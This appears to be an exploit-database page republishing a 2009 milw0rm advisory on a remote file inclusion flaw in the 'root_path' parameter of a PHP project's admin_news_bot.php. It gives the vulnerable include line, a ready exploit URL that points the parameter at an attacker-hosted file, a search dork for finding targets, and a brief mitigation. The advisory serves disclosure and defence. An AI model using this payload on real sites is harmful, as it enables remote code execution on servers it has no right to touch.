header-logo
Suggest Exploit
vendor:
N/A
by:
EA Ngel
7.5
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

include $root_path.”/include/irc/phpIRC.php”;

The vulnerability exists due to insufficient sanitization of user-supplied input passed via the 'root_path' parameter to '/admin/admin_news_bot.php' script. A remote attacker can send a specially crafted HTTP request with malicious code in the 'root_path' parameter and execute arbitrary PHP code on the vulnerable system.

Mitigation:

Input validation should be used to prevent the exploitation of this vulnerability.
Source

Exploit-DB raw data:

 [+] Author	      : EA Ngel
 [+] Location         : Manado - Indonesia
 [+] Situs            : www[dot]manadocoding[dot]net
 [+] Contact          : engelpemula[at]gmail[dot]com
 [+] Download Script  : http://sourceforge.net/projects/drunkengolem/



 [/] Dork             : sitou timou tumou tou




 [#] Bug              : include $root_path."/include/irc/phpIRC.php";




 [^] 3xpl0it          : http://localhost/[path]/admin/admin_news_bot.php?root_path=[napa.txt?]


                   
 [@] Special Thanks   

 
     - manadocoding   : basix, cr4wl3r, Mr.C, cokiki, bl4ck_3n91n3, tonaas, night_prophet, blue_eye, angky_tatoki
                        g4pt3k, michel_taung, doniskynet, rezagmas, Mr.Crossbeam, bolodewo and friend's


     - Sekuritionline : cyberlog, k1n9k0ng, fl3xu5, exnome, dbanie, d4rkz, setiawan, kujang_lapuk, jantap, k3nz0
                        and friend's   
                      
     
     - lain-lain      : akiko, steve_san, steve_diving, b0b0h0, yadiyauri, ipay, nTc, chawanua, S4NT4, my_wishdom
                        wendyz, wishnu, kiddies, anjaz chux, is-mail, is-blank P2, moon_lee beib, C6, missi, mizz,
                        hygao, b1beh^p1nk, tasya, san-san and friend's
                    


                    
 [^] Note             : A happy heart is good medicine and a cheerful mind works healing, but a broken spirit dries up the bones.


                        TUHAN MEMBERKATI  

# milw0rm.com [2009-09-10]

Navigation

Suggest Exploit

Services By CQR